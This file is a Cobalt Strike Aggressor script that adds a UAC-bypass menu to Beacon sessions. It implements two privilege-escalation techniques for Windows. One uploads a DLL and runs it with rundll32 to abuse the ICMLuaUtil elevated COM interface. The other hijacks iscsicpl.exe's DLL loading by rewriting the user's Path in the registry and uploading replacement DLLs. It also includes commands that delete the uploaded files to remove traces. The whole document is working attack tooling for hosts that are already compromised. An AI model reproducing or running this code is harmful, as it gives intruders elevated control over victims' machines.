sub combypassuac_{
	if (-is64 $3['bid']){
		blog($3['bid'], "The Beacon Arch:x64");
		$dllpath = script_resource("dll/x64/combypass.dll");
	}else{
		blog($3['bid'], "The Beacon Arch:x86");
		$dllpath = script_resource("dll/x86/combypass.dll");
	}

	btask($3['bid'], "Type: Elevated COM interface");
	btask($3['bid'], "Method: ICMLuaUtil");
	bupload($3['bid'], $dllpath);
	bshell($3['bid'], "rundll32 combypass.dll,MyBypassUAC $3['executepath']");
	brm($3['bid'], "combypass.dll");
}

sub combypassuac{
	foreach $id ($bid){
		$dialog = dialog("COM DLL Bypassuc", %(executepath => "C:\\Windows\\System32\\cmd.exe", bid => $id), &combypassuac_);
		dialog_description($dialog, "combypassuac #指定一个要运行的PE文件");
		drow_text($dialog, "executepath", "executepath:");
		dbutton_action($dialog, "run");
		dialog_show($dialog);
	}
}

sub iscsicplexebypassuac_{
	foreach $id ($bid){
		bshell($id, "reg add HKEY_CURRENT_USER\\Environment /v Path /d $3['Path'] /F");
		bcd($id, $3['Path']);
		bupload($id, script_resource("dll/x86/iscsiexe.dll"));
		bupload($id, script_resource("dll/x86/iscsiexe_org.dll"));
	}
}

sub iscsicplexebypassuac{
	$dialog = dialog("iscsicpl.exe ByPassUac", %(Path => "C:\\Users\\Public", bid => $bid), &iscsicplexebypassuac_);
	dialog_description($dialog, "c:\\Windows\\syswow64\\iscsicpl.exe缺少iscsiexe.dll和iscsiexe_org.dll");
	drow_text($dialog, "Path", "Path:");
	dbutton_action($dialog, "run");
	dialog_show($dialog);
}

sub iscsicplexebypassuacrun{
	foreach $id ($bid){
		bshell($id, "c:\\windows\\syswow64\\iscsicpl.exe c=$3['Command']");
	}
}

sub iscsicplexebypassuacdel_{
	foreach $id ($bid){
		bcd($id, $3['Path']);
		brm($id, "$3['Path']\\iscsiexe.dll");
		brm($id, "$3['Path']\\iscsiexe_org.dll");
	}

}

sub iscsicplexebypassuac2{
	$dialog = dialog("iscsicpl.exe ByPassUac", %(Command => "C:\\Windows\\System32\\cmd.exe", bid => $bid), &iscsicplexebypassuacrun);
	dialog_description($dialog, "c:\\windows\\syswow64\\iscsicpl.exe c=<command>");
	drow_text($dialog, "Command", "Command:");
	dbutton_action($dialog, "run");
	dialog_show($dialog);
}

sub iscsicplexebypassuacdel{
	$dialog = dialog("iscsicpl.exe ByPassUac", %(Path => "C:\\Users\\Public", bid => $bid), &iscsicplexebypassuacdel_);
	dialog_description($dialog, "删除上传的DLL");
	drow_text($dialog, "Path", "Path:");
	dbutton_action($dialog, "run");
	dialog_show($dialog);
}


popup beacon_bottom{
	menu "&bypassuac"{
		item "&Elevated COM Bypassuc"{
			$bid = $1;
			combypassuac($bid);
		}
		
		menu "&iscsicpl.exe ByPassUac"{
			item "&上传dll和修改注册表"{
				$bid = $1;
				iscsicplexebypassuac($bid);
			}
			
			item "&冲冲冲"{
				$bid = $1;
				iscsicplexebypassuac2($bid);
			}
			
			item "&删除dll"{
				$bid = $1;
				iscsicplexebypassuacdel($bid);
			}
		}
	}

}


